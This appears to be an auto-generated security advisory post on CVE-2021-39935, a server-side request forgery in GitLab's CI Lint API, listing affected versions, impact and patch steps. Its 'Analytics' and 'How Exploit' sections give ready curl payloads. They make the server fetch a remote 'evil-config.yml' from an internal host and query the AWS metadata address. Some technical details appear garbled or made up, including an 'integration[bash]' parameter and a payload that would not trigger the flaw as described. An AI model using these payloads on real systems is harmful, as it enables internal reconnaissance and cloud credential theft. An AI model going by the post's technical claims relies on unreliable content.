GitLab CE/EE, Server-side request forgery (SSRF), CVE-2021-39935 (MEDIUM)

Listen to this Post

How the mentioned CVE works (around 20 lines):

The vulnerability exists in the CI Lint API endpoint (/api/v4/ci/lint), which validates `.gitlab-ci.yml` configuration files. This API endpoint allowed external, unauthorized users to submit requests. A flaw in the request handling logic failed to properly validate or restrict the target of internal webhook calls triggered during the linting process. Specifically, it was possible to inject a malicious `integration[bash]` parameter within the configuration being validated. When the CI Lint service processed this configuration to check its syntax and logic, it would attempt to connect to the URL specified in the injected parameter. This mechanism could be abused to force the GitLab server to send HTTP requests to internal network services that are not normally accessible from the external internet. The attack complexity is high, requiring the attacker to craft a specific payload and understand the internal network. The attack vector is network-based, requiring no privileges or user interaction. Successful exploitation leads to a changed security scope, where the GitLab instance acts as an unintended proxy. The primary impact is high confidentiality risk, as the attacker can probe internal infrastructure, access metadata services (like AWS IMDS), or interact with internal HTTP endpoints. This could lead to the exposure of sensitive data from internal applications, though integrity and availability are not directly affected.
Platform: GitLab CE/EE
Version: 10.5 to 14.3.6
Version: 14.4 to 14.4.4
Version: 14.5 to 14.5.2
Vulnerability : SSRF
Severity: MEDIUM
date: 2021-12-13

Prediction: 2021-12-13

What Undercode Say:

Analytics

`curl -X POST “https://gitlab.example.com/api/v4/ci/lint” -H “Content-Type: application/json” -d ‘{“content”: “include:\n – remote: http://internal-service.local/evil-config.yml”}’`
`curl -X POST “https://gitlab.example.com/api/v4/ci/lint” -H “Content-Type: application/json” -d ‘{“content”: “job:\n script:\n – echo test\n after_script:\n – \”curl http://169.254.169.254/latest/meta-data/\””}’`

`gitlab-rake gitlab:check` (Post-patch validation)

Check version: `cat /opt/gitlab/embedded/service/gitlab-rails/VERSION`

Patch verification: `sudo gitlab-rake gitlab:env:info | grep Version`

How Exploit:

Craft a POST request to the `/api/v4/ci/lint` endpoint with a malicious `.gitlab-ci.yml` payload in the `content` field. The payload uses the `include:` directive with a `remote:` key pointing to an internal network URL or cloud metadata service. The GitLab server, while parsing this configuration, will attempt to fetch the remote file, triggering an outbound HTTP request from the server. This allows scanning of internal HTTP services or fetching data from restricted endpoints like 169.254.169.254.

Protection from this CVE:

Update GitLab immediately.

Apply network segmentation.

Restrict outbound traffic.

Use web application firewalls.

Patch to 14.3.6.

Patch to 14.4.4.

Patch to 14.5.2.

Impact:

Internal network reconnaissance.

Sensitive data exposure.

Cloud metadata access.

Bypass of firewall rules.

Confidentiality compromise.

No integrity loss.

No availability loss.

Medium severity score.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: www.cve.org
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top